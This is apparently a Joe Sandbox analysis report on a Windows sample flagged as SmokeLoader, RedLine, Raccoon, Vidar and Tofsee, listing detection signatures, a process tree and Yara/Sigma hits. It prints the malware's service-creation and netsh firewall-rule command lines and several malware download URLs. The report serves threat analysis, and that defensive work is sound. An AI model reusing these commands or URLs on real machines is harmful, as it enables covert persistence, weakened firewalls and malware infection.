Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report ECD2MpEBSf.exe

Overview

General Information

Sample Name:ECD2MpEBSf.exe
Analysis ID:553404
MD5:31f0d01ee1fd6876668692791657d97e
SHA1:a45a34a020ad13c9373bd14c45268004f505e1e1
SHA256:8facf32116a5f68467c71032d3a207abaa20fbcc56fcab6a3db650b4d30ad115
Tags:exeRedLineStealer
Infos:

Most interesting Screenshot:

Detection

Raccoon RedLine SmokeLoader Tofsee Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Sigma detected: Suspect Svchost Activity
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected Vidar stealer
Multi AV Scanner detection for dropped file
Yara detected Tofsee
Sigma detected: Copying Sensitive Files with Credential Data
Maps a DLL or memory area into another process
Found evasive API chain (may stop execution after checking mutex)
Uses netsh to modify the Windows network and firewall settings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Suspicious Svchost Process
Found evasive API chain (may stop execution after checking locale)
Contains functionality to inject code into remote processes
Deletes itself after installation
Tries to detect virtualization through RDTSC time measurements
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Drops executables to the windows directory (C:\Windows) and starts them
Checks if the current machine is a virtual machine (disk enumeration)
Writes to foreign memory regions
.NET source code references suspicious native API functions
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
PE file has nameless sections
Machine Learning detection for dropped file
Modifies the windows firewall
Contains functionality to detect sleep reduction / modifications
Found evasive API chain (may stop execution after checking computer name)
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Modifies existing windows services
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Sigma detected: Netsh Port or Application Allowed
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
PE file contains sections with non-standard names
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Found evaded block containing many API calls
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • ECD2MpEBSf.exe (PID: 7104 cmdline: "C:\Users\user\Desktop\ECD2MpEBSf.exe" MD5: 31F0D01EE1FD6876668692791657D97E)
    • ECD2MpEBSf.exe (PID: 7132 cmdline: "C:\Users\user\Desktop\ECD2MpEBSf.exe" MD5: 31F0D01EE1FD6876668692791657D97E)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • BB8A.exe (PID: 6816 cmdline: C:\Users\user\AppData\Local\Temp\BB8A.exe MD5: 277680BD3182EB0940BC356FF4712BEF)
          • WerFault.exe (PID: 6968 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6816 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
        • CCB2.exe (PID: 6844 cmdline: C:\Users\user\AppData\Local\Temp\CCB2.exe MD5: 043B44289E31BD54357F9A5C21833259)
        • D936.exe (PID: 7124 cmdline: C:\Users\user\AppData\Local\Temp\D936.exe MD5: 9517CA2BC20EC061024C1209970CCD2E)
          • cmd.exe (PID: 6412 cmdline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\qeprvgom\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 5468 cmdline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\krmdinzg.exe" C:\Windows\SysWOW64\qeprvgom\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 4608 cmdline: C:\Windows\System32\sc.exe" create qeprvgom binPath= "C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe /d\"C:\Users\user\AppData\Local\Temp\D936.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 6424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 6464 cmdline: C:\Windows\System32\sc.exe" description qeprvgom "wifi internet conection MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 6604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 1716 cmdline: "C:\Windows\System32\sc.exe" start qeprvgom MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 64 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • netsh.exe (PID: 6744 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
            • conhost.exe (PID: 3716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • 3D34.exe (PID: 6404 cmdline: C:\Users\user\AppData\Local\Temp\3D34.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
          • 3D34.exe (PID: 2832 cmdline: C:\Users\user\AppData\Local\Temp\3D34.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
          • 3D34.exe (PID: 472 cmdline: C:\Users\user\AppData\Local\Temp\3D34.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
        • A332.exe (PID: 6580 cmdline: C:\Users\user\AppData\Local\Temp\A332.exe MD5: 852D86F5BC34BF4AF7FA89C60569DF13)
        • CADF.exe (PID: 5628 cmdline: C:\Users\user\AppData\Local\Temp\CADF.exe MD5: CBE604877A46CEEBA112802BC17FFEF8)
          • CADF.exe (PID: 5504 cmdline: C:\Users\user\AppData\Local\Temp\CADF.exe MD5: CBE604877A46CEEBA112802BC17FFEF8)
        • D502.exe (PID: 2248 cmdline: C:\Users\user\AppData\Local\Temp\D502.exe MD5: 1B1E4286625BB189A526E910F2031C7B)
        • E3A9.exe (PID: 5272 cmdline: C:\Users\user\AppData\Local\Temp\E3A9.exe MD5: 5800952B83AECEFC3AA06CCB5B29A4C2)
          • AppLaunch.exe (PID: 5620 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
        • FB58.exe (PID: 5136 cmdline: C:\Users\user\AppData\Local\Temp\FB58.exe MD5: 852D86F5BC34BF4AF7FA89C60569DF13)
  • svchost.exe (PID: 6408 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3512 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • jgdhbua (PID: 6700 cmdline: C:\Users\user\AppData\Roaming\jgdhbua MD5: 31F0D01EE1FD6876668692791657D97E)
    • jgdhbua (PID: 6784 cmdline: C:\Users\user\AppData\Roaming\jgdhbua MD5: 31F0D01EE1FD6876668692791657D97E)
  • svchost.exe (PID: 6680 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6964 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 6876 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6816 -ip 6816 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 6064 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • krmdinzg.exe (PID: 6888 cmdline: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe /d"C:\Users\user\AppData\Local\Temp\D936.exe" MD5: C8DE2E3F0DF5D9E1C126828B1444DBEA)
    • svchost.exe (PID: 3000 cmdline: svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • jgdhbua (PID: 5664 cmdline: C:\Users\user\AppData\Roaming\jgdhbua MD5: 31F0D01EE1FD6876668692791657D97E)
    • jgdhbua (PID: 6308 cmdline: C:\Users\user\AppData\Roaming\jgdhbua MD5: 31F0D01EE1FD6876668692791657D97E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\A4DE.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x3b87:$x1: https://cdn.discordapp.com/attachments/

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.721727855.00000000006A1000.00000004.00020000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000005.00000000.708255964.00000000044C1000.00000020.00020000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000020.00000002.800983655.00000000006C0000.00000040.00000001.sdmpJoeSecurity_TofseeYara detected TofseeJoe Security
        00000020.00000003.798724710.00000000007C0000.00000004.00000001.sdmpJoeSecurity_TofseeYara detected TofseeJoe Security
          00000026.00000000.825922987.0000000000402000.00000040.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            Click to see the 28 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.1.ECD2MpEBSf.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              17.3.D936.exe.22d0000.0.raw.unpackJoeSecurity_TofseeYara detected TofseeJoe Security
                18.2.3D34.exe.430f910.1.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  18.2.3D34.exe.444ba90.2.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    32.2.krmdinzg.exe.400000.0.unpackJoeSecurity_TofseeYara detected TofseeJoe Security
                      Click to see the 20 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspect Svchost ActivityShow sources
                      Source: Process startedAuthor: David Burkett: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe /d"C:\Users\user\AppData\Local\Temp\D936.exe", ParentImage: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe, ParentProcessId: 6888, ProcessCommandLine: svchost.exe, ProcessId: 3000
                      Sigma detected: Copying Sensitive Files with Credential DataShow sources
                      Source: Process startedAuthor: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\krmdinzg.exe" C:\Windows\SysWOW64\qeprvgom\, CommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\krmdinzg.exe" C:\Windows\SysWOW64\qeprvgom\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\D936.exe, ParentImage: C:\Users\user\AppData\Local\Temp\D936.exe, ParentProcessId: 7124, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\krmdinzg.exe" C:\Windows\SysWOW64\qeprvgom\, ProcessId: 5468
                      Sigma detected: Suspicious Svchost ProcessShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe /d"C:\Users\user\AppData\Local\Temp\D936.exe", ParentImage: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe, ParentProcessId: 6888, ProcessCommandLine: svchost.exe, ProcessId: 3000
                      Sigma detected: Netsh Port or Application AllowedShow sources
                      Source: Process startedAuthor: Markus Neis, Sander Wiebing: Data: Command: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine|base64offset|contains: ijY, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\D936.exe, ParentImage: C:\Users\user\AppData\Local\Temp\D936.exe, ParentProcessId: 7124, ProcessCommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, ProcessId: 6744
                      Sigma detected: New Service CreationShow sources
                      Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\System32\sc.exe" create qeprvgom binPath= "C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe /d\"C:\Users\user\AppData\Local\Temp\D936.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine: C:\Windows\System32\sc.exe" create qeprvgom binPath= "C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe /d\"C:\Users\user\AppData\Local\Temp\D936.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\D936.exe, ParentImage: C:\Users\user\AppData\Local\Temp\D936.exe, ParentProcessId: 7124, ProcessCommandLine: C:\Windows\System32\sc.exe" create qeprvgom binPath= "C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe /d\"C:\Users\user\AppData\Local\Temp\D936.exe\"" type= own start= auto DisplayName= "wifi support, ProcessId: 4608

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Yara detected Raccoon StealerShow sources
                      Source: Yara matchFile source: 00000027.00000003.861803378.0000000004EC0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000003.920806858.0000000004E40000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.922842020.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.1015911464.0000000004DA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000002.1024642477.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Antivirus detection for URL or domainShow sources
                      Source: http://unicupload.top/install5.exeURL Reputation: Label: phishing
                      Source: http://data-host-coin-8.com/files/7729_1642101604_1835.exeAvira URL Cloud: Label: malware
                      Source: http://data-host-coin-8.com/files/9030_1641816409_7037.exeAvira URL Cloud: Label: malware
                      Source: http://81.163.30.181/l2.exeAvira URL Cloud: Label: malware
                      Source: http://185.7.214.171:8080/6.phpURL Reputation: Label: malware
                      Source: http://185.163.204.22/capibarAvira URL Cloud: Label: malware
                      Source: http://data-host-coin-8.com/files/6961_1642089187_2359.exeAvira URL Cloud: Label: malware
                      Source: http://81.163.30.181/l3.exeAvira URL Cloud: Label: malware
                      Antivirus detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\888A.exeAvira: detection malicious, Label: HEUR/AGEN.1212012
                      Source: C:\Users\user\AppData\Local\Temp\CADF.exeAvira: detection malicious, Label: HEUR/AGEN.1212012
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeAvira: detection malicious, Label: HEUR/AGEN.1211353
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: ECD2MpEBSf.exeVirustotal: Detection: 36%Perma Link
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeMetadefender: Detection: 45%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeReversingLabs: Detection: 89%
                      Source: C:\Users\user\AppData\Local\Temp\6C37.exeReversingLabs: Detection: 50%
                      Source: C:\Users\user\AppData\Local\Temp\A332.exeMetadefender: Detection: 34%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\A332.exeReversingLabs: Detection: 76%
                      Source: C:\Users\user\AppData\Local\Temp\A4DE.exeReversingLabs: Detection: 34%
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeMetadefender: Detection: 45%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeReversingLabs: Detection: 76%
                      Source: C:\Users\user\AppData\Local\Temp\FB58.exeMetadefender: Detection: 34%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\FB58.exeReversingLabs: Detection: 76%
                      Machine Learning detection for sampleShow sources
                      Source: ECD2MpEBSf.exeJoe Sandbox ML: detected
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\6C37.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\krmdinzg.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\A332.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\A4DE.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\FB58.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\E3A9.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\D502.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\9889.exeJoe Sandbox ML: detected
                      Source: 17.3.D936.exe.22d0000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 17.2.D936.exe.22b0e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 32.2.krmdinzg.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
                      Source: 35.2.svchost.exe.e70000.0.unpackAvira: Label: BDS/Backdoor.Gen
                      Source: 15.3.CCB2.exe.7b0000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 32.3.krmdinzg.exe.7c0000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 32.2.krmdinzg.exe.6c0e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 32.2.krmdinzg.exe.7c0000.2.unpackAvira: Label: BDS/Backdoor.Gen
                      Source: 17.2.D936.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
                      Source: 15.2.CCB2.exe.680e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00407470 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00404830 memset,CryptStringToBinaryA,CryptStringToBinaryA,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00407510 CryptUnprotectData,LocalAlloc,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00407190 CryptUnprotectData,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_004077A0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_006876C0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00684A80 CryptStringToBinaryA,CryptStringToBinaryA,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00687760 CryptUnprotectData,LocalAlloc,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_006873E0 CryptUnprotectData,
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_006879F0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,

                      Compliance:

                      barindex
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeUnpacked PE file: 15.2.CCB2.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeUnpacked PE file: 17.2.D936.exe.400000.0.unpack
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeUnpacked PE file: 32.2.krmdinzg.exe.400000.0.unpack
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49952 version: TLS 1.0
                      Source: ECD2MpEBSf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: unknownHTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.4:49789 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49807 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.4:49874 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49876 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49890 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49937 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49941 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49945 version: TLS 1.2
                      Source: Binary string: profapi.pdb source: WerFault.exe, 00000010.00000003.783122739.0000000004EC6000.00000004.00000040.sdmp
                      Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: BB8A.exe, 0000000C.00000000.759454697.0000000000413000.00000002.00020000.sdmp, BB8A.exe, 0000000C.00000000.765793505.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000010.00000002.807243826.0000000004DE0000.00000002.00020000.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: r*;\C:\xazunilula6\leziwobamer-mugudarecemas_gure.pdbh source: CCB2.exe, 0000000F.00000000.768135951.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.777349843.00000000049D7000.00000004.00000001.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: C:\nobaniz_sakalacato34.pdbh source: ECD2MpEBSf.exe, 00000000.00000002.667356464.0000000000401000.00000020.00020000.sdmp, ECD2MpEBSf.exe, 00000000.00000000.661810290.0000000000401000.00000020.00020000.sdmp, ECD2MpEBSf.exe, 00000001.00000000.664620927.0000000000401000.00000020.00020000.sdmp, jgdhbua, 00000009.00000000.751866281.0000000000401000.00000020.00020000.sdmp, jgdhbua, 00000009.00000002.758107473.0000000000401000.00000020.00020000.sdmp, jgdhbua, 0000000B.00000000.755033215.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: ;C:\bajudag\zexi\yedu49\hecicu\2-tiwi\cabilok\fes.pdbh source: D936.exe, 00000011.00000000.776580962.0000000000401000.00000020.00020000.sdmp, krmdinzg.exe, 00000020.00000000.795753078.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.778942214.0000000000B3E000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.777377914.0000000000B3E000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000010.00000003.783122739.0000000004EC6000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 00000010.00000003.783122739.0000000004EC6000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000010.00000003.783122739.0000000004EC6000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
                      Source: Binary string: C:\xazunilula6\leziwobamer-mugudarecemas_gure.pdb source: CCB2.exe, 0000000F.00000000.768135951.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 00000010.00000003.783122739.0000000004EC6000.00000004.00000040.sdmp
                      Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000010.00000003.783122739.0000000004EC6000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
